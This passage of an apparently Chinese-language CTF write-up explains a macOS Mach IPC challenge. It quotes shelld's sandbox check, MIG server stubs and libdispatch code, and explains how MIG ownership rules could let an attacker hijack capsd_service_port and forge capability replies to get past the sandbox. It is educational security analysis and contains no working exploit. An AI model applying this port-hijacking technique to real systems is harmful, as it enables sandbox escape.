class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> result = <span class="built_in">sandbox_check_by_audit_token</span>(creds, operation, flags, arg);</span><br><span class="line">    <span class="keyword">if</span> (result != <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> client_has_capability = <span class="number">0</span>;</span><br><span class="line">    <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(creds);</span><br><span class="line">    <span class="built_in">has_capability</span>(capsd_service_port, pid, operation, arg, &amp;client_has_capability);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> !client_has_capability;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>很明显，作为<strong>位于沙箱</strong>中的发送方，exploit 肯定没有权限执行 /bin/bash，因此 <code>sandbox_check_by_audit_token</code> 无论如何一定会返回 <strong>1</strong>。因此 shelld 将会向 capsd 进行第二次查询。</p><p>如果 capsd 中可以返回一个 has capability 的结果给 shelld，那么 exploit 就可以通过 sandbox check，从而 get flag。但正常情况下 exploit 无法通过 capsd 里 grand_capability 方法中的 sand_check_* 函数，因此 capsd <strong>将不会返回</strong>一个我们所期望的结果给 shelld。</p><p>那<strong>如果我们能劫持这个 capsd_service_port</strong> ，自己<strong>伪造一个 “capsd” 向 shelld 发送伪造结果</strong>，那么就可以通过 shelld 的 sandbox check，进而 get flag。</p><p>那该如何伪造呢？这就涉及 <strong>MIG 所有权规则（MIG ownership rule）</strong>。</p><h4 id="b-MIG-所有权规则">b. MIG 所有权规则</h4><p>这里的所有权，指的是<strong>调用者</strong>以<strong>参数</strong>形式 <strong>传给 MIG 例程的 mach port</strong>的所有权。</p><p>之前在学习 Mach IPC 时，我们只是简单的了解了 MIG 传递基础类型的例子，并没有思考过传递复杂类型参数时的一些细节。</p><p>现在仔细想想，对于<strong>调用者传递一个 mach port</strong> 给 server 的情况，这个 <strong>mach port 的生命周期</strong>该如何管理呢？</p><blockquote><p>这里，我们将以 shelld 中的 <code>register_completion_listener</code> 函数来作为一个例子，因为只有该函数会接收一个 mach port 类型的参数。</p></blockquote><h5 id="1-shelld-server">1) shelld_server</h5><p>初始时，shelld 会指定 shell_server 函数来处理所有传入的 mach message。而 MIG shelld_server 函数的功能相当简单：做一些基础检查工作，之后根据接收到的 mach message 中的 <code>msgh_id</code> 字段，来动态选择调用哪个 routine 例程：</p><blockquote><p>之前曾提到过，每个 mach message header 中有个字段 <code>msgh_id</code>，这个是可供用户自己使用的一个字段， MIG 使用该字段来区分client 想调用哪个 server 接口。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// shelldServer.c</span></span><br><span class="line"><span class="function">mig_external <span class="type">boolean_t</span> <span class="title">shelld_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">register</span> <span class="type">mig_routine_t</span> routine;</span><br><span class="line">    <span class="comment">// 初始化待返回给 client 的 mach message 相关字段</span></span><br><span class="line">    OutHeadP-&gt;msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(<span class="built_in">MACH_MSGH_BITS_REPLY</span>(InHeadP-&gt;msgh_bits), <span class="number">0</span>);</span><br><span class="line">    OutHeadP-&gt;msgh_remote_port = InHeadP-&gt;msgh_reply_port;</span><br><span class="line">    <span class="comment">/* Minimal size: routine() will update it if different */</span></span><br><span class="line">    OutHeadP-&gt;msgh_size = (<span class="type">mach_msg_size_t</span>)<span class="built_in">sizeof</span>(<span class="type">mig_reply_error_t</span>);</span><br><span class="line">    OutHeadP-&gt;msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    OutHeadP-&gt;msgh_id = InHeadP-&gt;msgh_id + <span class="number">100</span>;</span><br><span class="line">    OutHeadP-&gt;msgh_reserved = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 判断 msg_id 是否有效，如果有效，则设置 msg_id 对应的 MIG 接口处理例程至 routine 函数指针中</span></span><br><span class="line">    <span class="keyword">if</span> ((InHeadP-&gt;msgh_id &gt; <span class="number">133703</span>) || (InHeadP-&gt;msgh_id &lt; <span class="number">133700</span>) ||</span><br><span class="line">        ((routine = shelld_subsystem.routine[InHeadP-&gt;msgh_id - <span class="number">133700</span>].stub_routine) == <span class="number">0</span>)) &#123;</span><br><span class="line">        ((<span class="type">mig_reply_error_t</span> *)OutHeadP)-&gt;NDR = NDR_record;</span><br><span class="line">        ((<span class="type">mig_reply_error_t</span> *)OutHeadP)-&gt;RetCode = MIG_BAD_ID;</span><br><span class="line">        <span class="keyword">return</span> FALSE;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 最后调用该 MIG 接口处理例程</span></span><br><span class="line">    (*routine) (InHeadP, OutHeadP);</span><br><span class="line">    <span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是，shell_server 在 MIG 功能正常的情况下，将会<strong>始终返回 TRUE</strong>。</p><p>同时我们也可以看到，<strong>返回给 client 的信息并非 COMPLEX</strong>。</p><blockquote><p>注意给 OutHeadP 设置 msgh_bits 时没有指定 COMPLEX flag。</p></blockquote><h5 id="2-Xregister-completion-listener">2) _Xregister_completion_listener</h5><p>当 Client 需要调用 register_completion_listener 函数时，shelld_server 会对应的调用到该函数的 routine 函数，即 <code>_Xregister_completion_listener</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Routine register_completion_listener */</span></span><br><span class="line">mig_internal novalue _Xregister_completion_listener</span><br><span class="line">    (<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span><br><span class="line">&#123;</span><br><span class="line">[...]</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">mach_msg_header_t</span> Head;</span><br><span class="line">        <span class="comment">/* start of the kernel processed data */</span></span><br><span class="line">        <span class="type">mach_msg_body_t</span> msgh_body;</span><br><span class="line">        <span class="type">mach_msg_port_descriptor_t</span> listener;</span><br><span class="line">        <span class="comment">/* end of the kernel processed data */</span></span><br><span class="line">        NDR_record_t NDR;</span><br><span class="line">        <span class="type">mach_msg_type_number_t</span> sessionOffset; <span class="comment">/* MiG doesn&#x27;t use it */</span></span><br><span class="line">        <span class="type">mach_msg_type_number_t</span> sessionCnt;</span><br><span class="line">        <span class="type">char</span> session[<span class="number">4096</span>];</span><br><span class="line">        <span class="type">mach_msg_max_trailer_t</span> trailer;</span><br><span class="line">    &#125; Request __attribute__((unused));</span><br><span class="line">[...]</span><br><span class="line">    <span class="keyword">typedef</span> __Request__register_completion_listener_t __Request;</span><br><span class="line">    <span class="keyword">typedef</span> __Reply__register_completion_listener_t Reply __attribute__((unused));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Request *In0P = (Request *) InHeadP;</span><br><span class="line">    Reply *OutP = (Reply *) OutHeadP;</span><br><span class="line">    <span class="type">mach_msg_max_trailer_t</span> *TrailerP;</span><br><span class="line">[...]</span><br><span class="line">    OutP-&gt;RetCode = <span class="built_in">register_completion_listener</span>(In0P-&gt;Head.msgh_request_port, In0P-&gt;session, In0P-&gt;listener.name, TrailerP-&gt;msgh_audit);</span><br><span class="line">    </span><br><span class="line">[...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到，Client 传递 mach port 给 server 时，是通过 <code>mach_msg_port_descriptor_t</code>来传递的。并且在下面调用了最终服务器所实现的那个接口，并将返回值（KERN_* 类型）存入 <code>RetCode</code> 字段中。</p><p>以下是返回的 mach msg 结构体，可以看到这个字段是为数不多会向上层传递的值：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> Head;</span><br><span class="line">    NDR_record_t NDR;</span><br><span class="line">    <span class="type">kern_return_t</span> RetCode;</span><br><span class="line">&#125; __Reply__unregister_completion_listener_t __attribute__((unused));</span><br></pre></td></tr></table></figure><p>那么这个 RetCode 在哪里使用呢？换句话说 server 实现的接口所返回的 KERN_* 返回值，对 server 所接收到的 listener mach port 的生命周期有影响么？</p><p>还真有影响。</p><h5 id="3-libdispatch">3) libdispatch</h5><p>我们再来看看 libdispatch 是如何处理 client 传来的 mach message 的。</p><p>对于 shelld 来说，可以看到它指定 libdispatch 调用 <code>dispatch_mig_server</code> 函数来处理 mach message。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_server);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"><span class="built_in">dispatch_main</span>();</span><br></pre></td></tr></table></figure><p>那我们就来简单了解一下 <code>dispatch_mig_server</code>  这个函数，以下是该函数核心源代码，代码经过省略并添加大量说明文字：</p><blockquote><p>libdispatch 源码可以到 <a href="https://opensource.apple.com/tarballs/libdispatch/">apple opensource libdispatch src</a> 获取。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">dispatch_mig_server</span><span class="params">(<span class="type">dispatch_source_t</span> ds, <span class="type">size_t</span> maxmsgsz,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">dispatch_mig_callback_t</span> callback)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">uint32_t</span> cnt = <span class="number">1000</span>; <span class="comment">// do not stall out serial queues</span></span><br><span class="line">    <span class="type">boolean_t</span> demux_success;</span><br><span class="line">    <span class="type">bool</span> received = <span class="literal">false</span>;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    tmp_options = options;</span><br><span class="line">    <span class="comment">// XXX FIXME -- change this to not starve out the target queue</span></span><br><span class="line">    <span class="comment">// 尝试  cnt 次从消息队列中读取数据的操作</span></span><br><span class="line">    <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">        <span class="comment">// 如果循环经历了 cnt 次，或者等待队列为空</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">DISPATCH_QUEUE_IS_SUSPENDED</span>(ds) || (--cnt == <span class="number">0</span>)) &#123;</span><br><span class="line">            <span class="comment">// 则在接下来的函数执行过程中，不再接收 mach message</span></span><br><span class="line">            options &amp;= ~MACH_RCV_MSG;</span><br><span class="line">            tmp_options &amp;= ~MACH_RCV_MSG;</span><br><span class="line">            <span class="comment">// 如果此时没有需要发送的数据，即这次是要继续尝试接收 message ，则直接返回</span></span><br><span class="line">            <span class="keyword">if</span> (!(tmp_options &amp; MACH_SEND_MSG)) &#123;</span><br><span class="line">                <span class="keyword">goto</span> out;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 此时 mach_msg 可能会接收或发送消息。循环第一次为RCV，第二次为SEND+RCV，第三次为SEND+RCV,最后一次为RCV，以此类推。</span></span><br><span class="line">        kr = <span class="built_in">mach_msg</span>(&amp;bufReply-&gt;Head, tmp_options, bufReply-&gt;Head.msgh_size,</span><br><span class="line">                (<span class="type">mach_msg_size_t</span>)rcv_size, (<span class="type">mach_port_t</span>)dr-&gt;du_ident, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// 重置临时设置</span></span><br><span class="line">        tmp_options = options;</span><br><span class="line">        <span class="comment">// mach_msg 错误处理，这里无需关注</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(kr)) &#123;</span><br><span class="line">            [...]</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果接下来不再需要接收消息，则直接返回</span></span><br><span class="line">        <span class="keyword">if</span> (!(tmp_options &amp; MACH_RCV_MSG)) &#123;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line">        <span class="comment">// 走到这里则说明这一轮的循环 接收了一个 mach message(有没有在接收的时候顺带发了个msg，这里不管)</span></span><br><span class="line">        received = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// bufRequest 和 bufReply 进行交换</span></span><br><span class="line">        bufTemp = bufRequest;</span><br><span class="line">        bufRequest = bufReply;</span><br><span class="line">        bufReply = bufTemp;</span><br><span class="line">        <span class="comment">// 此时接收到的 Mach msg 位于 bufRequest</span></span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line">        </span><br><span class="line">        _voucher_replace(<span class="built_in">voucher_create_with_mach_msg</span>(&amp;bufRequest-&gt;Head));</span><br><span class="line">        bufReply-&gt;Head = (<span class="type">mach_msg_header_t</span>)&#123; &#125;;</span><br><span class="line">        <span class="comment">// 将接收到的信息调用 callback 处理，这里的 callback 是其他程序为 dispatch_mig_server 函数指定的一个 MIG 处理例程</span></span><br><span class="line">        <span class="comment">// 在 shelld 中，这个 callback 为 shelld_server</span></span><br><span class="line">        demux_success = <span class="built_in">callback</span>(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 如果传入的 MIG Message 的 msgh_id 错误，导致 callback 失败</span></span><br><span class="line">        <span class="keyword">if</span> (!demux_success) &#123;</span><br><span class="line">            <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">            bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">            <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">        <span class="comment">// 如果 callback 成功，并且需要返回的信息并非复杂信息</span></span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">            <span class="comment">// if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply-&gt;RetCode</span></span><br><span class="line">            <span class="comment">// is present</span></span><br><span class="line">            <span class="comment">// 如果调用 server 的接口失败，即该接口返回的值不为 KERN_SUCCESS</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bufReply-&gt;RetCode)) &#123;</span><br><span class="line">                [...]</span><br><span class="line"></span><br><span class="line">                <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">                bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">                <span class="comment">// 将会析构掉发来的 mach message</span></span><br><span class="line">                <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果需要回复信息，则设置 SEND flag，一会将跳转至循环头部执行 mach_msg(RCV|SEND)</span></span><br><span class="line">        <span class="keyword">if</span> (bufReply-&gt;Head.msgh_remote_port) &#123;</span><br><span class="line">            tmp_options |= MACH_SEND_MSG;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">MACH_MSGH_BITS_REMOTE</span>(bufReply-&gt;Head.msgh_bits) !=</span><br><span class="line">                    MACH_MSG_TYPE_MOVE_SEND_ONCE) &#123;</span><br><span class="line">                tmp_options |= MACH_SEND_TIMEOUT;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> kr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>注意到这个片段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 在 shelld 中，这个 callback 为 shelld_server</span></span><br><span class="line">demux_success = <span class="built_in">callback</span>(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 如果传入的 MIG Message 的 msgh_id 错误，导致 callback 失败</span></span><br><span class="line"><span class="keyword">if</span> (!demux_success) &#123;</span><br><span class="line">    [...]</span><br><span class="line"><span class="comment">// 如果 callback 成功，并且需要返回的信息并非复杂信息</span></span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">    <span class="comment">// if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply-&gt;RetCode</span></span><br><span class="line">    <span class="comment">// is present</span></span><br><span class="line">    <span class="comment">// 如果调用 server 的接口失败，即该接口返回的值不为 KERN_SUCCESS</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bufReply-&gt;RetCode)) &#123;</span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">        bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 将会析构掉发来的 mach message</span></span><br><span class="line">        <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中， callback 为之前 shelld 所指定的 <code>shelld_server</code>，几乎<strong>不可能返回 FALSE</strong>，同时待回复的 <strong>mach message 不为 COMPLEX</strong>，因此接下来的第一个 if 判断将不成立，进入第二个 if 分支中。</p><p>在这个 if 分支中，dispatch_mig_server 将对调用结果 RetCode 进行判断：<strong>如果调用失败，则调用 mach_msg_destroy 将 Request message 析构</strong>。</p><p>而在 <code>mach_msg_destroy</code> 的 XNU 实现中，注意到它会析构掉所传入 mach msg 中的 <code>MACH_MSG_PORT_DESCRIPTOR</code>，而这里<strong>存放的是先前 client 传来的 listerner mach port</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_destroy</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">mach_msg_bits_t</span> mbits = msg-&gt;msgh_bits;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * The msgh_local_port field doesn&#x27;t hold a port right.</span></span><br><span class="line"><span class="comment">     * The receive operation consumes the destination port right.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">mach_msg_destroy_port</span>(msg-&gt;msgh_remote_port, <span class="built_in">MACH_MSGH_BITS_REMOTE</span>(mbits));</span><br><span class="line">    <span class="built_in">mach_msg_destroy_port</span>(msg-&gt;msgh_voucher_port, <span class="built_in">MACH_MSGH_BITS_VOUCHER</span>(mbits));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (mbits &amp; MACH_MSGH_BITS_COMPLEX) &#123;</span><br><span class="line">        <span class="type">mach_msg_base_t</span>         *base;</span><br><span class="line">        <span class="type">mach_msg_type_number_t</span>  count, i;</span><br><span class="line">        <span class="type">mach_msg_descriptor_t</span>   *daddr;</span><br><span class="line"></span><br><span class="line">        base = (<span class="type">mach_msg_base_t</span> *) msg;</span><br><span class="line">        count = base-&gt;body.msgh_descriptor_count;</span><br><span class="line"></span><br><span class="line">        daddr = (<span class="type">mach_msg_descriptor_t</span> *) (base + <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; count; i++) &#123;</span><br><span class="line">            <span class="keyword">switch</span> (daddr-&gt;type.type) &#123;</span><br><span class="line">                <span class="keyword">case</span> MACH_MSG_PORT_DESCRIPTOR: &#123;</span><br><span class="line">                    <span class="comment">// 如果传入的 mach msg 中 description 类型为 PORT，则调用 mach_msg_destroy_port 将其释放</span></span><br><span class="line">                    <span class="type">mach_msg_port_descriptor_t</span> *dsc;</span><br><span class="line"></span><br><span class="line">                    <span class="comment">/* </span></span><br><span class="line"><span class="comment">                     * Destroy port rights carried in the message </span></span><br><span class="line"><span class="comment">                     */</span></span><br><span class="line">                    dsc = &amp;daddr-&gt;port;</span><br><span class="line">                    <span class="comment">// 而 mach_msg_destroy_port 函数均会调用 mach_port_deallocate 释放该 port</span></span><br><span class="line">                    <span class="built_in">mach_msg_destroy_port</span>(dsc-&gt;name, dsc-&gt;disposition);</span><br><span class="line">                    daddr = (<span class="type">mach_msg_descriptor_t</span> *)(dsc + <span class="number">1</span>);</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                [...]</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这意味着：<strong>若 Server 所实现接口不返回 KERN_SUCCESS 时，libdispatch 将自动释放 client 传给 server 的 <code>listener</code> (mach port)。</strong></p><p>即：<strong>如果 MIG 调用 返回成功代码，则意味着该方法获得了消息中包含的所有 mach port right 的所有权；如果 MIG 调用 返回失败代码，则意味着该方法对消息中包含的 mach port right 不具有任何所有权</strong>，此时消息中包含的 mach port right 将会静默被 MIG 析构。</p><h5 id="4-mach-msg-server">4) mach_msg_server*</h5><p>除了 libdispatch 以外，其他用于 MIG 的 <code>mach_msg_server</code> 和 <code>mach_msg_server_once</code> 函数同样遵循该规则：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_server</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">boolean_t</span> (*demux)(<span class="type">mach_msg_header_t</span> *, <span class="type">mach_msg_header_t</span> *),</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_msg_size_t</span> max_size,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_t</span> rcv_name,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_msg_options_t</span> options)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 获取发来的信息</span></span><br><span class="line">        mr = <span class="built_in">mach_msg</span>(&amp;bufRequest-&gt;Head, MACH_RCV_MSG|MACH_RCV_VOUCHER|options,</span><br><span class="line">                  <span class="number">0</span>, request_size, rcv_name,</span><br><span class="line">                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span> (mr == MACH_MSG_SUCCESS) &#123;</span><br><span class="line">            <span class="comment">/* we have another request message */</span></span><br><span 